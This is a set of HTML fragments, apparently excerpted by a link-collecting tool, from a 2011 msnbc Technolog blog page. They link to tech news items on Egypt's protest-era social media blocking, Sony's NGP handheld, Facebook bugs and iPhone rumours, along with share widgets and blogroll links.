<div id="vine-inlinePhoto__5936378" data-contentId="5936378" class="inlinePhoto photo_landscape photo_align_right user_inline_photo" style="width:280px;"><img id="helenaspopkin/5936378.jpg" src="http://www.polls.newsvine.com/_vine/images/users/nws/helenaspopkin/5936378.jpg" width="280" height="183" alt="" /><div class="photo_credit_container">
...[SNIP]...
<p>While Oreo may be the very first in her family to obtain a diploma, she's not alone in her species. Fraudulent diplomas among the house pet set are so popular, <a href="http://en.wikipedia.org/wiki/List_of_animals_with_fraudulent_diplomas">there&rsquo;s even a Wikipedia page that lists the honorees</a>
...[SNIP]...
<p>Learn more about the "Cat Credentialing Project" and how to find a qualified hypnotherapist <a href="http://www.dreichel.com/dr_zoe.htm#Zoe follow-up">on Dr. Eichel's website</a>
...[SNIP]...
<em><a href="http://gizmodo.com/5745108/how-a-cat-named-zoe-earned-several-advanced-degrees-and-became-a-psychotherapist">via Gizmodo</a>
...[SNIP]...
<em>Helen A.S. Popkin writes about the Internet ... a lot. Get your fill of her blather on <a href="http://www.facebook.com/home.php#/profile.php?id=1151660271">Facebook</a> and <a href="http://twitter.com/HelenASPopkin">Twitter</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/27/5936323-online-degrees-qualify-cat-to-be-your-shrink" data-Text="Online degrees qualify cat to be your shrink">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&amp;show_faces=true&amp;width=480&amp;action=recommend&amp;colorscheme=light&amp;href=http://technolog.msnbc.redacted/_news/2011/01/27/5936323-online-degrees-qualify-cat-to-be-your-shrink" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<br />Twitter has been blocked in Egypt, but news about demonstrations, arrests and police retaliation are still being circulated on the Twitter hashtags <a href="http://twitter.com/#!/search?q=%23Egypt ">#Egypt</a>
...[SNIP]...
<p><a href="http://english.aljazeera.net/news/middleeast/2011/01/201112523026521335.html">Al Jazeera&rsquo;s staff </a>has compiled tweets on the protests.&nbsp;<a href="http://english.aljazeera.net/news/middleeast/2011/01/201112523026521335.html"></a>
...[SNIP]...
<br />Protesters continue to upload video, like this one of a man standing in front of a water-cannon truck, dubbing it, &ldquo;<a href="http://www.youtube.com/watch?v=YtTUsqra-MU ">Egypt&rsquo;s Tiananmen Square moment</a>
...[SNIP]...
</param><embed src="http://www.youtube.com/v/YtTUsqra-MU&amp;hl=en_US&amp;fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="600" height="429"></embed>
...[SNIP]...
<p>This <a href="http://www.youtube.com/">YouTube</a>
...[SNIP]...
</param><embed src="http://www.youtube.com/v/Jjd6CGckke0&amp;hl=en_US&amp;fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="600" height="429"></embed>
...[SNIP]...
<br />The English edition of the independent <a href="http://www.almasryalyoum.com/en/subchannel/Top%20stories">Egyptian newspaper Al-Masry Al-Youm</a>
...[SNIP]...
<p>The <a href="http://www.guardian.co.uk/world/blog/2011/jan/27/egypt-protests">Guardian newspaper is live blogging </a>
...[SNIP]...
<p>Global Voices, an international community of bloggers, translates local social media into English and has a page dedicated to <a href="http://globalvoicesonline.org/specialcoverage/egypt-protests-2011/ ">Egypt Protests 2011.</a>
...[SNIP]...
<br /><a href="http://english.aljazeera.net/">Al Jazeera</a>
...[SNIP]...
<p>The <a href="http://thelede.blogs.nytimes.com/">New York Times&rsquo; Lede blog</a>
...[SNIP]...
<p>The Council on Foreign Relations has coverage of the foreign policy implications with one of the Middle East experts, <a href="http://blogs.cfr.org/cook/">Steven Cook, blogging from Cairo</a>
...[SNIP]...
<p><a href="http://blogs.cfr.org/cook/"></a>Foreign Policy also has an interesting analysis on the million-dollar question: <a href="http://lynch.foreignpolicy.com/posts/2011/01/26/will_the_arab_revolutions_spread">&ldquo;Will the Arab revolutions spread?&rdquo;</a>
...[SNIP]...
<p><a href="http://www.economist.com/node/18013760 ">The Economist</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://worldblog.msnbc.redacted/_news/2011/01/27/5936053-watching-egypts-protests?chromedomain=technolog" data-Text="Watching Egypt's protests">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&amp;show_faces=true&amp;width=480&amp;action=recommend&amp;colorscheme=light&amp;href=http://worldblog.msnbc.redacted/_news/2011/01/27/5936053-watching-egypts-protests?chromedomain=technolog" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
.33 million iPads. According to Ross Rubin at NPD, more than half were likely sold in the U.S. Let's say it's 4 million, for the sake of easy math. In that same quarter, AT&amp;T announced that it had <a href="http://www.att.com/gen/press-room?pid=18952&amp;cdvn=news&amp;newsarticleid=31519&amp;mapcode=financial">activated 442,000 3G iPads</a>
...[SNIP]...
<em>Catch up with Wilson on Twitter at <a href="http://twitter.com/wjrothman">@wjrothman</a>, or join the conversation on our <a href="http://www.facebook.com/technolog">Technolog Facebook page</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/27/5935983-dont-worry-wi-fi-only-tablets-are-coming" data-Text="Don't worry, Wi-Fi-only tablets are coming">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&amp;show_faces=true&amp;width=480&amp;action=recommend&amp;colorscheme=light&amp;href=http://technolog.msnbc.redacted/_news/2011/01/27/5935983-dont-worry-wi-fi-only-tablets-are-coming" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div id="vine-inlinePhoto__5935650" data-contentId="5935650" class="inlinePhoto photo_portrait photo_align_right user_inline_photo" style="width:264px;"><img id="helenaspopkin/5935650.jpg" src="http://www.polls.newsvine.com/_vine/images/users/nws/helenaspopkin/5935650.jpg" width="264" height="324" alt="" /><!-- end5935650 -->
...[SNIP]...
<p>"Is anybody else getting random status updates from this person?" reads the first post in a Facebook Security discussion titled<a href="http://www.facebook.com/topic.php?uid=31987371885&amp;topic=14769"> "Roy Castillo (Roy Castillo)"</a>
...[SNIP]...
<p>Then on Thursday, like Keyser S&ouml;ze, he was gone, leaving little more than dozens of unanswered user questions, a <a href="http://www.facebook.com/topic.php?uid=31987371885&amp;topic=14769#!/pages/Roy-Castillo-WTF/191704690855344">Roy Castillo WTF Fan Page </a>and a <a href="http://twitter.com/#!/search/%23roycastillo">hilarious Twitter thread</a>
...[SNIP]...
<em>Helen A.S. Popkin writes about Facebook ... a lot. Follow her on <a href="http://twitter.com/helenaspopkin">Twitter</a> and/or <a href="http://www.facebook.com/pages/manage/#!/pages/Helen-AS-Popkin/120508047967128">Facebook</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/27/5935542-mysterious-roy-castillo-haunts-facebook" data-Text="Mysterious 'Roy Castillo' haunts Facebook">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&amp;show_faces=true&amp;width=480&amp;action=recommend&amp;colorscheme=light&amp;href=http://technolog.msnbc.redacted/_news/2011/01/27/5935542-mysterious-roy-castillo-haunts-facebook" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
</em><a target="_blank" href="http://bit.ly/caLhBE"><em>
...[SNIP]...
</em><a target="_blank" href="http://twitter.com/WindaBenedetti"><em>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://ingame.msnbc.redacted/_news/2011/01/27/5935136-android-getting-games-from-sony?chromedomain=technolog" data-Text="Android getting games from Sony">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&amp;show_faces=true&amp;width=480&amp;action=recommend&amp;colorscheme=light&amp;href=http://ingame.msnbc.redacted/_news/2011/01/27/5935136-android-getting-games-from-sony?chromedomain=technolog" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<p>That's what&nbsp;Verizon is&nbsp;apparently offering, according to an e-mail shared by <a href="http://www.macrumors.com/2011/01/26/verizon-iphone-pre-orders-to-start-at-3am-et-on-february-3rd-offering-atandt-trade-ins/">MacRumors.com</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/27/5934826-verizon-offering-att-iphone-trade-in-program" data-Text="Verizon offering AT&T iPhone trade-in program?">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&amp;show_faces=true&amp;width=480&amp;action=recommend&amp;colorscheme=light&amp;href=http://technolog.msnbc.redacted/_news/2011/01/27/5934826-verizon-offering-att-iphone-trade-in-program" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div id="vine-inlinePhoto__5934467" data-contentId="5934467" class="inlinePhoto photo_landscape photo_align_right user_inline_photo" style="width:280px;"><img id="helenaspopkin/5934467.jpg" src="http://www.polls.newsvine.com/_vine/images/users/nws/helenaspopkin/5934467.jpg" width="280" height="210" alt="" /><div class="photo_credit_container">
...[SNIP]...
</span> <a href="http://www.macrumors.com/2011/01/26/verizon-iphone-pre-orders-to-start-at-3am-et-on-february-3rd-offering-atandt-trade-ins/"><span>
...[SNIP]...
</span> saga, controversy, and hopefully, <a href="http://www.youtube.com/watch?v=4L-ueFdKzjc&amp;feature=player_embedded">Julian <span>
...[SNIP]...
<p>Hooray! <a href="http://www.urlesque.com/2011/01/27/old-spice-guy-isaiah-mustafa-back/">The Old Spice dude is back!</a>
...[SNIP]...
<p>Oh noes! An&nbsp;Amazon security flaw may make <a href="http://feeds.gawker.com/~r/lifehacker/full/~3/VbASl0_jzW8/amazon-security-flaw-may-make-your-old-password-easy-to-crack">your&nbsp;old Amazon password easy to crack</a>
...[SNIP]...
</span> ... I wonder what ever happened to all those nerds in that one iconic Microsoft staff photo from 1978. <a href="http://www.businessinsider.com/microsoft-1978-photo-2011-1#">Maybe this link knows something.&nbsp;</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/27/5934345-pre-caffeine-tech-security-cracks-70s-nerds" data-Text="Pre-caffeine tech: Security cracks, '70s nerds">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&amp;show_faces=true&amp;width=480&amp;action=recommend&amp;colorscheme=light&amp;href=http://technolog.msnbc.redacted/_news/2011/01/27/5934345-pre-caffeine-tech-security-cracks-70s-nerds" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div id="vine-inlineCode__5936907" class="inlineCode photo_align_block" data-contentid="5936907"><object width="592" height="346" id="msnbc8a9862" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=10,0,0,0"><param name="movie" value="http://www.msnbc.redacted/id/32545640" />
...[SNIP]...
<p>President of SCE Worldwide Studios, Shuhei Yoshida, told the audience at the Tokyo event that the NGP's graphics are of&nbsp;PlayStation 3 quality, reported game blog Kotaku, which had reporter <a target="_blank" href="http://kotaku.com/5744297/live+blogging-sonys-psp2-press-event">Brian Ashcraft on site and live blogging from the event.</a>
...[SNIP]...
<div id="vine-inlinePhoto__5932923" data-contentId="5932923" class="inlinePhoto photo_landscape photo_align_block user_inline_photo" style="width:600px;"><img id="wbenedetti/5932923.jpg" src="http://www.polls.newsvine.com/_vine/images/users/600/wbenedetti/5932923.jpg" width="600" height="396" alt="" /><p class="photo_credit">
...[SNIP]...
</span>And famed "Metal Gear" creator Hideo Kojima demonstrated "Metal Gear Solid 4: Guns of the Patriots" running on the NGP. In fact, <a target="_blank" href="http://kotaku.com/5744571/metal-gear-solid-4-lost-planet-yakuza-shown-playable-on-psp2">Kotaku reports</a>
...[SNIP]...
<p>The NGP certainly isn't a small device. Sony calls it a "Super Oval Design" which is meant to be comfortable for long play sessions, according to Sony's Jeff Rubenstein, who live blogged the event <a target="_blank" href="http://blog.us.playstation.com/2011/01/26/live-from-japan-playstation-meeting-2011/">via the PlayStation Blog</a>.&nbsp;And at 182 mm&nbsp;by 18.6 mm by&nbsp;83.5 mm, it&nbsp;is&nbsp;larger than the current model PSP 3000. In fact, for a look at just how big it is, check out Kotaku's visual&nbsp;<a target="_blank" href="http://kotaku.com/5744563/lets-see-how-big-this-psp2-really-is">size comparison here</a>
...[SNIP]...
<div id="vine-inlinePhoto__5933512" data-contentId="5933512" class="inlinePhoto photo_landscape photo_align_block user_inline_photo" style="width:600px;"><img id="wbenedetti/5933512.jpg" src="http://www.polls.newsvine.com/_vine/images/users/600/wbenedetti/5933512.jpg" width="600" height="409" alt="" /><div class="photo_credit_container">
...[SNIP]...
</em><a target="_blank" href="http://bit.ly/caLhBE"><em>
...[SNIP]...
</em><a target="_blank" href="http://twitter.com/WindaBenedetti"><em>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://ingame.msnbc.redacted/_news/2011/01/27/5931513-sony-reveals-psp-successor-the-next-generation-portable?chromedomain=technolog" data-Text="Sony reveals PSP successor - the Next Generation Portable">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&amp;show_faces=true&amp;width=480&amp;action=recommend&amp;colorscheme=light&amp;href=http://ingame.msnbc.redacted/_news/2011/01/27/5931513-sony-reveals-psp-successor-the-next-generation-portable?chromedomain=technolog" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div id="vine-inlinePhoto__5927180" data-contentId="5927180" class="inlinePhoto photo_landscape photo_align_right user_inline_photo" style="width:280px;"><img id="suzanne-choney/5927180.jpg" src="http://www.polls.newsvine.com/_vine/images/users/nws/suzanne-choney/5927180.jpg" width="280" height="135" alt="" /><!-- end5927180 -->
...[SNIP]...
<p>On Twitter, the short-messaging blog where posts are limited to 140 characters, access from Egypt was difficult as reported by <a href="http://www.herdict.org/web/">Herdict.org</a>
...[SNIP]...
million members and has the largest number of users of Facebook&rsquo;s Arabic interface (2.2 million Facebook Arabic users in Egypt, versus 1.8 million in the Kingdom of Saudi Arabia)," according to <a href="http://www.spotonpr.com/egypt-facebook-demographics/">Spot On PR</a>
...[SNIP]...
networking shut-out&nbsp;has echoes of Iran 2-1/2 years ago, when in the wake of the presidential election and protests, the government there worked to block network and dial-up access to Facebook and <a href="http://redtape.msnbc.com/2009/06/twitter-1-censorship-0-why-its-working.html">Twitter</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/26/5926198-egypt-may-be-blocking-twitter-and-facebook-as-protests-grow" data-Text="Egypt may be blocking Twitter and Facebook as protests grow">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&amp;show_faces=true&amp;width=480&amp;action=recommend&amp;colorscheme=light&amp;href=http://technolog.msnbc.redacted/_news/2011/01/26/5926198-egypt-may-be-blocking-twitter-and-facebook-as-protests-grow" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
</em> - HTC is slated to unveil not one but two Facebook phones in February at the Mobile World Congress in Barcelona, according to <a href="http://www.cityam.com/news-and-analysis/facebook-launch-first-mobile-phone">City AM</a>
...[SNIP]...
<p>City AM's reporter may have reported on the existence of the second Google Nexus phone, as <a href="http://mashable.com/2010/10/26/nexus-two/">Mashable points out</a>
...[SNIP]...
<em><a href="http://www.cityam.com/news-and-analysis/facebook-launch-first-mobile-phone">City AM</a> via <a href="http://www.businessinsider.com/facebook-phone-wont-be-a-new-platform-2011-1">Business Insider</a> and <a href="http://mashable.com/2011/01/26/htc-to-unveil-2-facebook-phones-next-month/">Mashable</a>
...[SNIP]...
<i>Catch up with Wilson on Twitter at <a href="http://twitter.com/wjrothman">@wjrothman</a>, or skip the one-on-one and join the conversation at our <a href="http://www.facebook.com/technolog">Technolog Facebook page</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/26/5926146-rumor-facebook-phones-are-coming" data-Text="Rumor: Facebook phones are coming!!!">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&amp;show_faces=true&amp;width=480&amp;action=recommend&amp;colorscheme=light&amp;href=http://technolog.msnbc.redacted/_news/2011/01/26/5926146-rumor-facebook-phones-are-coming" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div id="vine-inlinePhoto__5927996" data-contentId="5927996" class="inlinePhoto photo_landscape photo_align_right user_inline_photo" style="width:280px;"><img id="wbenedetti/5927996.jpg" src="http://www.polls.newsvine.com/_vine/images/users/nws/wbenedetti/5927996.jpg" width="280" height="173" alt="" /><p class="photo_credit">
...[SNIP]...
<p>The Sony Ericsson Xperia Play phone has run rampant in the rumor mill for months now, but <a target="_blank" href="http://www.engadget.com/2011/01/26/sony-ericsson-xperia-play-playstation-phone-preview/">Engadget reports</a>
...[SNIP]...
<p>Engadget reminds readers that "what we're seeing here is subject to changes." They expect Sony to reveal many of the final details about the phone at the <a target="_blank" href="http://www.mobileworldcongress.com/">Mobile World Congress taking place in Spain</a>
...[SNIP]...
<p>Check out the entirety of&nbsp;Engadget's coverage and their many photos of the device&nbsp;<a target="_blank" href="http://www.engadget.com/2011/01/26/sony-ericsson-xperia-play-playstation-phone-preview/">here</a>
...[SNIP]...
</em><a target="_blank" href="http://bit.ly/caLhBE"><i>
...[SNIP]...
</i><a target="_blank" href="http://twitter.com/WindaBenedetti"><i>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://ingame.msnbc.redacted/_news/2011/01/26/5926152-sonys-playstation-phone-is-for-real?chromedomain=technolog" data-Text="Sony's PlayStation phone is for real">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&amp;show_faces=true&amp;width=480&amp;action=recommend&amp;colorscheme=light&amp;href=http://ingame.msnbc.redacted/_news/2011/01/26/5926152-sonys-playstation-phone-is-for-real?chromedomain=technolog" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div id="vine-inlinePhoto__5925431" data-contentId="5925431" class="inlinePhoto photo_landscape photo_align_right user_inline_photo" style="width:280px;"><img id="suzanne-choney/5925431.jpg" src="http://www.polls.newsvine.com/_vine/images/users/nws/suzanne-choney/5925431.jpg" width="280" height="157" alt="" /><!-- end5925431 -->
...[SNIP]...
<p>It doesn't appear to be&nbsp;a huge issue, but it is an irritating one&nbsp;&mdash; many Facebook users have shared their befuddlement on <a href="http://www.facebook.com/topic.php?uid=31987371885&amp;topic=14747&amp;post=70129">Facebook's discussion page</a>
...[SNIP]...
<p>Hat tip to <a href="http://valleywag.gawker.com/5743293/facebook-mobile-says-to-call-911">Valleywag</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/26/5925380-ignore-facebook-messages-to-call-911-" data-Text="Ignore Facebook messages to call 911 ">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&amp;show_faces=true&amp;width=480&amp;action=recommend&amp;colorscheme=light&amp;href=http://technolog.msnbc.redacted/_news/2011/01/26/5925380-ignore-facebook-messages-to-call-911-" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<p>It's all part of Facebook's "Data Privacy Day" celebration, a poorly promoted &mdash; <a href="http://dataprivacyday2010.org/about/">yet totally real</a>
...[SNIP]...
<p>According to <a href="http://blog.facebook.com/blog.php?post=486790652130">Facebook's Data Privacy Day blog post</a>
...[SNIP]...
<strong>Here's some other known bugs <a href="http://www.facebook.com/help/?search=known+issues#!/help/?page=777">Facebook is actively dealing with right now</a>
...[SNIP]...
<p>And&nbsp;in the grand spirit of Data Privacy Day, <a href="http://blog.facebook.com/blog.php?post=436800707130">here's some current Facebook security information you should know</a>
...[SNIP]...
</em><a href="http://twitter.com/helenaspopkin"><i>
...[SNIP]...
</em><a href="http://www.facebook.com/pages/manage/#!/pages/Helen-AS-Popkin/120508047967128"><i>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/26/5925209-locked-out-of-facebook-happy-data-privacy-day-" data-Text="Locked out of Facebook? Happy 'Data Privacy Day!' ">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&amp;show_faces=true&amp;width=480&amp;action=recommend&amp;colorscheme=light&amp;href=http://technolog.msnbc.redacted/_news/2011/01/26/5925209-locked-out-of-facebook-happy-data-privacy-day-" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="avatar"><a href="http://michaelwann.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/michaelwann-318009268.jpg" width="60" height="60" /></a>
...[SNIP]...
<li class="twitter"><a href="http://twitter.com/MichaelWann">Follow on Twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://technolog2.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/wjrothman-1049670252.jpg" width="60" height="60" /></a>
...[SNIP]...
from Time and the NYT to the notorious tech blog Gizmodo, where he was features editor for three years. He is not an Apple fanboy, but sometimes he is mistaken for one. You can stalk him on Twitter at <a href="http://twitter.com/wjrothman">@wjrothman</a>
...[SNIP]...
<li class="twitter"><a href="http://twitter.com/wjrothman">Follow on Twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://helenaspopkin.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/helenaspopkin-1308146463.jpg" width="60" height="60" /></a>
...[SNIP]...
<li class="twitter"><a href="http://twitter.com/HelenASPopkin">Follow on Twitter</a>
...[SNIP]...
<li class="facebook"><a href="http://www.facebook.com/HelenASPopkin">Become a fan on Facebook</a>
...[SNIP]...
<div class="avatar"><a href="http://suzanne-choney.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/suzanne-choney-604078999.jpg" width="60" height="60" /></a>
...[SNIP]...
<li class="twitter"><a href="http://www.twitter.com/suzannechoney">Follow on Twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://alex-johnson.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/alex-johnson-743865123.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://malexj.wordpress.com/">Editor at Large</a>
...[SNIP]...
<li class="follow on twitter"><a href="http://www.twitter.com/MAlexJohnson">Follow on Twitter</a>
...[SNIP]...
<li class="follow on facebook"><a href="http://malexj.tk/6M">Follow on Facebook</a>
...[SNIP]...
<div class="avatar"><a href="http://redtape.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/redtape-920134022.jpg" width="60" height="60" /></a>
...[SNIP]...
<div class="avatar"><a href="http://boyle.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/boyle-747955448.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://blogs.discovermagazine.com/badastronomy/">Bad Astronomy</a>
...[SNIP]...
<li><a href="http://www.collectspace.com/">CollectSpace</a>
...[SNIP]...
<li><a href="http://blogs.discovermagazine.com/cosmicvariance/">Cosmic Variance</a>
...[SNIP]...
<li><a href="http://curmudgeons.blogspot.com/">Curmudgeons Corner</a>
...[SNIP]...
<li><a href="http://news.discovery.com/">Discovery News</a>
...[SNIP]...
<li><a href="http://www.dailygrail.com/">The Daily Grail</a>
...[SNIP]...
<li><a href="http://earthsky.org/">EarthSky</a></li><li><a href="http://www.geekpress.com/">GeekPress</a></li><li><a href="http://www.habitablezone.com/space/">Habitable Zone</a>
...[SNIP]...
<li><a href="http://www.hobbyspace.com/">HobbySpace Log</a>
...[SNIP]...
<li><a href="http://www.livescience.com/">LiveScience</a>
...[SNIP]...
<li><a href="http://blogs.discovermagazine.com/loom/">The Loom</a></li><li><a href="http://www.nasawatch.com/">NASA Watch</a></li><li><a href="http://www.nasaspaceflight.com/">NASA Spaceflight</a>
...[SNIP]...
<li><a href="http://www.outofthecradle.net/">Out of the Cradle</a>
...[SNIP]...
<li><a href="http://www.scidev.net/">SciDev.net</a></li><li><a href="http://www.scienceblog.com/cms/index.php">Science Blog</a>
...[SNIP]...
<li><a href="http://www.scienceblogs.com/">ScienceBlogs</a>
...[SNIP]...
<li><a href="http://www.signonsandiego.com/news/blogs/science-quest/">Science Quest</a>
...[SNIP]...
<li><a href="http://www.scientificamerican.com/blog/observations/">SciAm Observations</a>
...[SNIP]...
<li><a href="http://seedmagazine.com/">Seed Magazine</a>
...[SNIP]...
<li><a href="http://science.slashdot.org">Slashdot Science</a>
...[SNIP]...
<li><a href="http://www.space.com/">Space.com</a></li><li><a href="http://www.spacedaily.com/">Spaceflight Now</a>
...[SNIP]...
<li><a href="http://spacefellowship.com/">Space Fellowship</a>
...[SNIP]...
<li><a href="http://www.thespacereview.com/">The Space Review</a>
...[SNIP]...
<li><a href="http://www.transterrestrial.com/">Transterrestrial Musings</a>
...[SNIP]...
